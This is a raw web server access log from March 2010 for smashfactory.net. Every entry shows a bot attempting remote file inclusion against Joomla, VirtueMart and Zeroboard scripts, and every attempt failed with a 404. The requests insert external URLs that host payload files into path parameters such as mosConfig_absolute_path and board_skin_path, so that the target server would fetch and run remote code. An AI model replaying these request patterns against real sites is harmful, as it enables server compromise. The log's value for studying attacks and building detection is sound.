69.16.237.166 - - [09/Mar/2010:16:09:23 -0800] "GET /bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
69.16.237.166 - - [09/Mar/2010:16:09:23 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
69.16.237.166 - - [09/Mar/2010:16:09:23 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:41 -0800] "GET //delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:42 -0800] "GET /logs/access.log///delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:42 -0800] "GET /logs///delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:46 -0800] "GET /logs///delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:46 -0800] "GET //delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
96.9.132.197 - - [09/Mar/2010:16:11:48 -0800] "GET /logs/access.log///delete_update.php?board_skin_path=http://segaero.or.kr/ver2/data/file/extra/id1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:15:14 -0800] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:15:14 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:17:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:17:26 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:18:20 -0800] "GET /logs/access.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:18:20 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:18:20 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:49 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:51 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:51 -0800] "GET /logs/access.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:51 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:51 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:19:53 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 - "-" "-" "smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:22:32 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:22:32 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:23:51 -0800] "GET /logs/////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:23:51 -0800] "GET ////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:25:36 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:25:36 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:25:37 -0800] "GET /logs/access_100205.log/////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:26:45 -0800] "GET /logs/////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:26:45 -0800] "GET ////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:26:45 -0800] "GET /logs/access.log%20%20/////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:26:52 -0800] "GET /logs/access_100205.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:26:52 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:26:57 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:16:27:21 -0800] "GET /logs/access_100205.log%20%20/////write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:27:46 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:27:46 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:27:50 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:16:27:50 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.smashfactory.net"
212.241.177.123 - - [09/Mar/2010:16:48:43 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
212.241.177.123 - - [09/Mar/2010:16:48:43 -0800] "GET /logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
212.241.177.123 - - [09/Mar/2010:16:48:43 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:37 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:37 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:41 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:41 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:17:04:41 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:17:07:51 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
194.109.22.115 - - [09/Mar/2010:17:07:51 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
194.109.22.115 - - [09/Mar/2010:17:07:51 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:12:33 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:12:33 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:17:12:33 -0800] "GET /logs/access.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:28:50 -0800] "GET /logs////skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:28:50 -0800] "GET /logs/access.log%20%20////skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:28:50 -0800] "GET ///skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:29:17 -0800] "GET /logs////skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:29:17 -0800] "GET ///skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
61.100.181.218 - - [09/Mar/2010:17:29:17 -0800] "GET /logs/access.log%20%20////skin/board/moviefl/download.php?board_skin_path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:39:39 -0800] "GET /logs/access.log///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:39:39 -0800] "GET //////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:39:39 -0800] "GET /logs///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:37 -0800] "GET /logs/access.log///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:37 -0800] "GET //////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:37 -0800] "GET /logs///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:41 -0800] "GET /logs/access.log///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:41 -0800] "GET //////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
79.174.78.178 - - [09/Mar/2010:17:40:41 -0800] "GET /logs///////write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:36 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:37 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:37 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:37 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:37 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:38 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:38 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:39 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:39 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.189.224.16 - - [09/Mar/2010:17:42:40 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:40 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:42:40 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:29 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:30 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:38 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:38 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:38 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:40 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:40 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:43 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:44 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:44 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:44 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:45 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:45 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:45 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:45 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:47 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:43:47 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
81.93.240.71 - - [09/Mar/2010:17:43:48 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:44:38 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:44:38 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:44:38 -0800] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:44:38 -0800] "GET /logs/access.log%20%20/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:44:38 -0800] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
174.142.61.173 - - [09/Mar/2010:17:45:06 -0800] "GET /logs/access.log/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
